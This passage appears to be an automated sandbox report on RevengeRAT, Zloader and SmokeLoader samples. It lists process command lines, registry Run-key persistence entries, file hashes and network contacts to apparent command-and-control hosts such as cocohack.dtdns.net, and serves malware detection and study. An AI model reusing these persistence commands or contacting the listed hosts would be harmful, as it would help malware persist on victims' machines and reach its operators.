C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\m11wn0pn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE00A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc91BBE61E3417416C88B12B5935D7FDE.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wgw8srui.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE087.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB76BF563A5DA429489C87DDF8BD059CF.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mxvvqxye.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE124.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD4BD86BBD46442A87209EBF69A08AED.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
PT 84.91.119.105:333 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
PT 84.91.119.105:333 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
PT 84.91.119.105:333 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp

Files

memory/3340-0-0x00007FFF45DE5000-0x00007FFF45DE6000-memory.dmp

memory/3340-1-0x000000001C0B0000-0x000000001C57E000-memory.dmp

memory/3340-2-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/3340-3-0x000000001BAC0000-0x000000001BB66000-memory.dmp

memory/3340-4-0x000000001C640000-0x000000001C6A2000-memory.dmp

memory/3340-5-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/3340-6-0x000000001CEB0000-0x000000001CF4C000-memory.dmp

memory/3340-7-0x00007FFF45DE5000-0x00007FFF45DE6000-memory.dmp

memory/3340-8-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

C:\Windows\System32\MSSCS.exe

MD5 6fe3fb85216045fdf8186429c27458a7
SHA1 ef2c68d0b3edf3def5d90f1525fe87c2142e5710
SHA256 905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550
SHA512 d2180f2d7ca35362a2dc322801fb0eee22820f2ac317c0be4c788c31d3939d30c9b356bf8daf0746545fb66092471f46f5d47c40403ed68b09415fcca90a125c

memory/2384-17-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/2384-19-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/3340-20-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/2384-21-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

memory/2384-22-0x00007FFF45B30000-0x00007FFF464D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dghw2x2x.iw5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4388-39-0x000001C7DEEE0000-0x000001C7DEF02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ftnr_cu.cmdline

MD5 11af3d8d38766adb80e7e9f6381cc3a5
SHA1 57e98e5fe2c5c45b2dd6df8c6d4548c12193cb17
SHA256 b190651ae671b734d733e6b0714c08ce6cb86a200272a98a8a06b35d33bd5c2b
SHA512 eb5062483fcfd3a0a8decacc93e5ba7304a49a0c91e8f259da34f385994d66554764632ddf239876de6caf0ee13af8dedc627b1246d55d53114a6b1786ad5517

C:\Users\Admin\AppData\Local\Temp\2ftnr_cu.0.vb

MD5 076803692ac8c38d8ee02672a9d49778
SHA1 45d2287f33f3358661c3d6a884d2a526fc6a0a46
SHA256 5b3ab23bcadaeb54a41bdb1636bcaf7772af028d375f42baeb967de6579ef2a3
SHA512 cc9126384a287ccb99d10d5c2d3034cdbc8a45e94f1cec48dd95f2aa08ebbe3053ffd6d6effa31f2d84164edbb6136398cd02c08b05f027a6a777dffd1daea5d

C:\Users\Admin\AppData\Local\Temp\vbc9DA3FBAE4258484894F1ECC3A7387531.TMP

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESDB19.tmp

MD5 096be938c9a84b9511d70a62f8aaf9e0
SHA1 a0406b301a38adbbcacad1e4a9a100a0d63a73d6
SHA256 56d8fd3a095e1320bbfd0fe6b4a7eaa4f3e80ee9cbc148e2d77b903e90034f8c
SHA512 e85306ab305691877c8ad012df32cb38926b5d46cd87be0c18a27846af73c34ac496a4fb54850e877b19f0330074a5fdfa3809473ca509586e88678c7cee0035

C:\Users\Admin\AppData\Local\Temp\-shvcskp.cmdline

MD5 fbcf82d584d3974df75ed713180d2aa0
SHA1 84784203d05470dfb670cec75b02327e65007ff5
SHA256 e145d5c06b0c481c9a20a7e9ed8a3d24f552dad15c2b94ef50e5fa1ee3841fa8
SHA512 8a670d563365361e8196fcfcd6ac1f1a7a376725a63ff4919fb14850ac6a25cee31c80cad760f856551a5d2ce6827dbfb77815d20ab7e071a2433813021e64cf

C:\Users\Admin\AppData\Local\Temp\-shvcskp.0.vb

MD5 88cc385da858aaa7057b54eaeb0df718
SHA1 b108224d4686b5ca3faaeb1c728dfba8740a6eca
SHA256 08a30db98d970e3b6819d5ecff6eab2211ce93f4cd000c09db96ffb294d05020
SHA512 4787835240c3e2364172ac2e7649ec8fecb907c7006c38734e59aa65509f360b4596d5db8de20e0c7388a022e1c2f4f9ba75acabba798bea1d40f688539b7df7

C:\Users\Admin\AppData\Local\Temp\vbc54A96236D0624DF6BBEC967FDF6C15.TMP

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESDC71.tmp

MD5 38492e8055999fff37f373fcff27ee58
SHA1 a38b79d85cedd6400d3ea30be3f5f5d75738ddb1
SHA256 982224d6ba9d7abd1286ed6b8bb5a5110889142bbe788f5417386ed031a4c772
SHA512 c1895d2641ddf6ebd20a4f855df71ee0fe84004ff3acfbe254201aa94859b72a936f2f91d640a01ff1b81d17877ee441320f53a5df363d2c802bba90746027c8

C:\Users\Admin\AppData\Local\Temp\ablc4dv5.cmdline

MD5 40b2ce499fe7d719b31c24883ca9d006
SHA1 b85900992594cef14ea3bea8ba7f4c4516886eb0
SHA256 6d529dffb4097956dd96bf60243c5b1490a367810bea9bc72107e03b5bf037c3
SHA512 1392a409db26795c6042088d7e25b0f87f8b96d1c706ec04286c738558ff2d36fafaca36e73c50de81c88c1315fa753c04b099649d1c7bcaa1876365e230ac4c

C:\Users\Admin\AppData\Local\Temp\ablc4dv5.0.vb

MD5 d1110a95f1e40f726584bd99eca52fe7
SHA1 97fac683e1116ab31a9cc9c3dcfd9fe9e53505c3
SHA256 00f373eb310beace70146b6e0fd188aa2f437efb2e5a2714a11d4d58e27d3142
SHA512 f15b5b310ace82a0106b551d71ad3d48e1c75085aa78b8bb3374a2334ceb073bd4d1bf4cd0b4e39034c39f01b6bcd76e8be30198e4872f5641a7d29b255154b4

C:\Users\Admin\AppData\Local\Temp\vbc53F0601A12304F2F8A8B3C7B76198264.TMP

MD5 85c61c03055878407f9433e0cc278eb7
SHA1 15a60f1519aefb81cb63c5993400dd7d31b1202f
SHA256 f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b
SHA512 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756

C:\Users\Admin\AppData\Local\Temp\RESDD4B.tmp

MD5 56ee5e8fa39f2570a5689582ed5bc6f0
SHA1 e8b7e1779fde89053fb6ad07ff0a6368991df039
SHA256 4f2998f7348caf8217d767c64b2c4a5c23ab99bad395bb295c9cf290c91a7af4
SHA512 8c2d34c11bf42812d10b65f5ce434a1cd3e3f6d722210fd49cc1dd5c060975037b8dd1c2dfb2913185e9d185f30d00bde7ffb28bd020151d30ca2ed7fc592a2a

C:\Users\Admin\AppData\Local\Temp\s5zqt77d.cmdline

MD5 3417faa9335e9a1286291fdfd4a98424
SHA1 41801b2509f4863666c7e387a719c7b94fccdbb0
SHA256 7128e7a27255edfd49fdadc62c74a6ab218dda4039224ba4fd052ba78f96ad4e
SHA512 704ec50ceb4736d7c4edac2f75210d4db7424d890c3c0c2f5132e52e0e39822b130b1a597b1085255d96e841e5ec2384079f0a8b6a32b6dae93ed19ab4a3e57c

C:\Users\Admin\AppData\Local\Temp\s5zqt77d.0.vb

MD5 ac972015bef75b540eb33503d6e28cc2
SHA1 5c1d09fcf4c719711532dcfd0544dfc6f2b90260
SHA256 fa445cc76cde3461a5f1f1281fefcb0c7db69b2685f8a67a06a0f33a067e74e7
SHA512 36b2e1f7b7a6f2c60788f88d95bfdc53b7d261c203eb637a36fbd07d81bc46edc87e528f1987df73963cb75ca2f19c3a4b3df9ade52d5768ecec23753099cc83

C:\Users\Admin\AppData\Local\Temp\RESDE16.tmp

MD5 05cb1867cf49427ff75f0093cd96f61c
SHA1 2570907a5cd40d0ff8589479bfabf55c58e71339
SHA256 290a333b391020a64857f8195e10611981e56bc78bf00b2aa52ca55595d503ee
SHA512 2a897981d47c6704df2307719338d6b519ce7219b9a18cb258e7c21fbe7f0c7cad15cfde292327eec72c4e2cced4bdc7a207b62774d31276259ffdf534455b3c

C:\Users\Admin\AppData\Local\Temp\8d7tl15i.cmdline

MD5 19b202c22446cb423dd190b377928655
SHA1 afa011d1468feb4760aa67625fe203b9bc50ba6c
SHA256 bb2abb5ee6aebd0d4a5267926edac1e3fdbb9fd7c6d7f964f9fbc6388a1194ec
SHA512 8f5a0d6d16221d813baf4f5e19d261a6b46f9a05d6248ceef151ad546ee3cc3d962cc931c37eeb01ba8dae8bcae88d31f2e076da00bf876b0518df3c266e5f01

C:\Users\Admin\AppData\Local\Temp\8d7tl15i.0.vb

MD5 2b3aac520562a93ebef6a5905d4765c9
SHA1 10ab45c5d73934b16fac5e30bf22f17d3e0810c8
SHA256 b9f0edf067faaaa7da2d47e3d22b957cd302eb25e01e08ea79c664868f328f89
SHA512 9514934ed12d93ea3ad4e6873cf294bafa114bc7a784a93b14dd2410d07fae3a2c00308035a5c129c57e283de8b94ed36fd9f9de35b08eb79a82a0c732e50446

C:\Users\Admin\AppData\Local\Temp\RESDE93.tmp

MD5 060e866baf6fb3d8e8ac1bf59211db35
SHA1 bc9077c39b9c7dacb4f0c8d62ed9f6f97d0bca2f
SHA256 eec5d50725654e9f7ee7daaa1c1bbbea71bb15d8c7aa6d121a5f5ac767e91460
SHA512 8245b6b15d0996b876c05fc608d87edde6b68de62bf4b58e8d42162f2b8928308dcb2ba1b9fa6b194bb171906e9e0f993d663d1763e495440bd6b63691b02735

C:\Users\Admin\AppData\Local\Temp\6ae38hpy.cmdline

MD5 5f95c65cf3029f991326c44488938ac6
SHA1 3ded5898c2ac11e2eac10556b42f39ae1e874046
SHA256 9dd8bb93002e5e6aed7685e234eae6abbf9b5925cc7fced088c325e25247ac2a
SHA512 ca6a0e2301220978e74f502501991e71ebfb6c47ca165478efb47c5a28321314369852d4cb8a170c39419ce94bc0bbd486186bf1db8f41abd4baa6dfb6fc767e

C:\Users\Admin\AppData\Local\Temp\6ae38hpy.0.vb

MD5 325f27ef75bebe8b3f80680add1943d3
SHA1 1c48e211258f8887946afb063e9315b7609b4ee3
SHA256 034c75813491d628a1a740b45888fc0c301b915456aaa7ba6433b4f1368cda35
SHA512 e2165b425558872897990953c26e48776f45751a53da035f1ad86ac062ec23a2923b984d84f992de5c0170f6e192feb155ffff25f51bc76ab273b996daacb804

C:\Users\Admin\AppData\Local\Temp\RESDF20.tmp

MD5 267ca882c152f1dd4497de5edbd98fff
SHA1 bfe427016e4cbfe6cbc56cf431245dba352c7597
SHA256 8f59a7201c9c7328059be6ed7b10285064d17eb443d83296d898235f46c4df6f
SHA512 ecc03e0e0c6a3a62c9228f9959d132f24c514f061ea14792ceb411702dcb1e7a8fdd9c0d170993d3fcc8639accf9f1256866c371ce2a20b44536452fca1c563d

C:\Users\Admin\AppData\Local\Temp\i_trai9o.cmdline

MD5 44ae2b7739066304d0ff15441bb29af7
SHA1 199989f12917473dea94f20f4c4ec440f4615049
SHA256 b1ec333586188074d2f037aca8795c2dfd025b74c79d2779d8b1a5464f7f4b31
SHA512 0522a4b359fd2cf87ee435819d33555e47116760027c2e1d87d7a9fb275edd4e716287aff70a39e310b97fed1106724ddffc3717ba9ef39b53b4ea0cb67b81f9

C:\Users\Admin\AppData\Local\Temp\i_trai9o.0.vb

MD5 539683c4ca4ee4dc46b412c5651f20f5
SHA1 564f25837ce382f1534b088cf2ca1b8c4b078aed
SHA256 ec2210924d5c1af6377ef4bdf76d6ca773aaa1ae0438b0850f44d8c4e16ef92e
SHA512 df7c1a55e53f9b9bf23d27762d2d1163c78808e9b4d95e98c84c55ca4ecb7009ed58574ae6ddede31459f300483a1dc42987295a04f6c8702f297d3f1942f4ac

C:\Users\Admin\AppData\Local\Temp\vbcF07B89C6C46142469E7210AF7975AEFE.TMP

MD5 8135713eeb0cf1521c80ad8f3e7aad22
SHA1 1628969dc6256816b2ab9b1c0163fcff0971c154
SHA256 e14dd88df69dc98be5bedcbc8c43d1e7260b4492899fec24d964000a3b096c7a
SHA512 a0b7210095767b437a668a6b0bcedf42268e80b9184b9910ed67d665fba9f714d06c06bff7b3da63846791d606807d13311946505776a1b891b39058cfb41bd4

C:\Users\Admin\AppData\Local\Temp\RESDF9D.tmp

MD5 f9e988542914190be4664dd1e0b16d2a
SHA1 cfc9dd742c22633a39934ed94166b62b5331c0cd
SHA256 3d95fd6e28bf5bf877a156a8dc64f12e4e2fb1523b2f2a2666935f6da13278da
SHA512 ddedc3ec21f61ad5db22c684bb2f2540a9cc7b296846f80141c52a959073292884378ee92859aacdb43b33250cecaee6de6fa55389184a66211e46a2fb327773

C:\Users\Admin\AppData\Local\Temp\m11wn0pn.cmdline

MD5 378d310a2c18b043f5d681465cb930fb
SHA1 affcb967c191d393352ab514105fe3afd71b9435
SHA256 477eeebf118e34a6f9fb26f2d1c480e0db9aea845db37d7bbc0e26bfc6115f96
SHA512 b2e0f0f71e46e54ccdbced08fd001baf63afc98fdf7f46cc464438d8d23162a6cda1bf80d1a59d6aa4d052c34749ae97568ca28ec745e8659895040e4b62fdd1

C:\Users\Admin\AppData\Local\Temp\m11wn0pn.0.vb

MD5 5ce3977a153152978fa71f8aa96909e9
SHA1 52af143c553c92afc257f0e0d556908eaa8919cb
SHA256 e07a7bd0c2901d3a349ab55e936b34de2d0abb5f2dc555cc128773b8045d3eed
SHA512 eaee02ceade0211be70a4710b28fdf043d5c540928e2095ead924a44c2edfca8fc6499395d1b7f5deee96394fb5309362fb87e45ee195094ec39d5fa11909d77

C:\Users\Admin\AppData\Local\Temp\RESE00A.tmp

MD5 80dba522168e29681b55b819eb68d624
SHA1 bd306746a67a9d1ad637cf9324b83cd1e09513a6
SHA256 f5ded8f15b2b32c72363c2007aad80a460a5eb16bbcd0f1b25d72ade504bea89
SHA512 071266b65c20c28ab625868c1e616af2a9dcc58f28e4eadb5db0287630f7a1dd2acb448b3040cd9aecc877db47578b9f21cd560d40b54955592b1c9bc8ea3400

C:\Users\Admin\AppData\Local\Temp\wgw8srui.cmdline

MD5 309973f154151604eb019781165c0f47
SHA1 86a35a0f901280c4ffb6e1d6728db79dbc646195
SHA256 2790b363cd360cbf47b2ea94279a73a40570bc632e92265563c4af7ac7ee8cd5
SHA512 1f431c3297a065a588a718169b264f5550636bddb6d335201115e79464cdeea0ecbf42f0c6f65c0e9e0d3098d760a86c893d5ec899e9a68c21a2af109b7db3b2

C:\Users\Admin\AppData\Local\Temp\wgw8srui.0.vb

MD5 658573fde2bebc77c740da7ddaa4634b
SHA1 073da76c50b4033fcfdfb37ba6176afd77b0ea55
SHA256 c07206283d62100d426ba62a81e97bd433966f8b52b5a8dd1451e29a804a1607
SHA512 f93c7f4378be5eca51161d1541d772a34c07884c9d829608c6fa21563df5691920394afe9da1174ad5c13f773a588b186d1d38a9d375a28562eb58ca4a8b8fbf

C:\Users\Admin\AppData\Local\Temp\RESE087.tmp

MD5 d5c560ac3b1e31b4f918c53e5e10c247
SHA1 d5916fcde8798ee9d31a1cf4fcc1e4e6929f6d66
SHA256 472a153ab357fc16be3b9c9680dcd37db135acfdfcaba84476126b853411accb
SHA512 18420b8e26046d0b4515412f47bd486a57efcf097bd6fcbba1124d840db95a765e51210bd811ca95be134e1bd5d8cb8a940733c232e1b3411ac87ede7c8ad399

C:\Users\Admin\AppData\Local\Temp\mxvvqxye.cmdline

MD5 e72235fed0dac95ad7863fa8384c142c
SHA1 2419952684521d63da405550c60f8ef7afe9c926
SHA256 cd06be643194c831223f07d0250eb8add46262adc7f3620e67115c85784499f9
SHA512 eb1ac1e1c6d039cc80621e09bff71c934544588ae0af8a1a769501aa33b7baa943c9e0c7165a56635882a24bfbcb7ef13e81a65191ea91e3d28c86b38c8fc3a4

C:\Users\Admin\AppData\Local\Temp\mxvvqxye.0.vb

MD5 3c3d3136aa9f1b87290839a1d26ad07a
SHA1 005a23a138be5d7a98bdd4a6cc7fab8bdca962f4
SHA256 5b745f85a39312bfa585edbd7e3465371578b42fa639eded4cdad8c9f96b87fd
SHA512 fbb085ffcd77ac96c245067fd96a0c20492d55331161f292975b0c11386424a96534a500133217f84d44455e16139d01230455bce5db3d472271620c29381f60

C:\Users\Admin\AppData\Local\Temp\vbcD4BD86BBD46442A87209EBF69A08AED.TMP

MD5 7a707b422baa7ca0bc8883cbe68961e7
SHA1 addf3158670a318c3e8e6fdd6d560244b9e8860e
SHA256 453ad1da51152e3512760bbd206304bf48f9c880f63b6a0726009e2d1371c71c
SHA512 81147c1c4c5859249f4e25d754103f3843416e3d0610ac81ee2ef5e5f50622ea37f0c68eeb7fa404f8a1779dc52af02d2142874e39c212c66fa458e0d62926a9

C:\Users\Admin\AppData\Local\Temp\RESE124.tmp

MD5 e6579954197734a721281cdab6e2f4a9
SHA1 edfd27abdf27579a568d3afcda338ae39dbca9ad
SHA256 4166d76d75631957050b4d8c22f69c7045992c5f0972fcf1e0b7f972e5ac7871
SHA512 1f9facac9b4124ae7a8337f357992bcf675629dd20f7f09e4b1628911f57f56beec62e1546452256d3d98e12320dc60c2248d86048e8174e6b78aa6474082c15

Analysis: behavioral24

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe" C:\Users\Admin\AppData\Roaming\Client.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

C:\Users\Admin\AppData\Roaming\Client.exe

"C:\Users\Admin\AppData\Roaming\Client.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 cocohack.dtdns.net udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

memory/820-0-0x00007FFC5B0D5000-0x00007FFC5B0D6000-memory.dmp

memory/820-1-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/820-2-0x000000001BA80000-0x000000001BF4E000-memory.dmp

memory/820-3-0x000000001BF50000-0x000000001BFF6000-memory.dmp

memory/820-4-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/820-5-0x000000001C0C0000-0x000000001C122000-memory.dmp

memory/820-6-0x00007FFC5B0D5000-0x00007FFC5B0D6000-memory.dmp

memory/820-7-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Client.exe

MD5 aa0a434f00c138ef445bf89493a6d731
SHA1 2e798c079b179b736247cf20d1346657db9632c7
SHA256 948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654
SHA512 e5b50ccd82c9cd5797dfc278dbd4bef6b4cb4468424962666d2618707a3c69e0154e8fb11846e0f529dd6e903fd9de2a2f4dd3b526821b10f08530371a0c6952

memory/820-18-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/4624-17-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/4624-19-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/4624-20-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

memory/4624-21-0x00007FFC5AE20000-0x00007FFC5B7C1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

155s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gehy = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\Offi\\ceyb.dll,DllRegisterServer" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2924 set thread context of 548 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

memory/548-0-0x0000000000800000-0x0000000000825000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

122s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0di3x.exe

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

Network

N/A

Files

memory/2420-1-0x00000000033F0000-0x00000000034F0000-memory.dmp

memory/2420-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2420-3-0x0000000000220000-0x000000000022A000-memory.dmp

\Users\Admin\AppData\Local\Temp\2F6.tmp

MD5 d124f55b9393c976963407dff51ffa79
SHA1 2c7bbedd79791bfb866898c85b504186db610b5d
SHA256 ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512 278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

memory/2420-8-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2420-7-0x0000000000400000-0x0000000002FA6000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

89s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Program crash

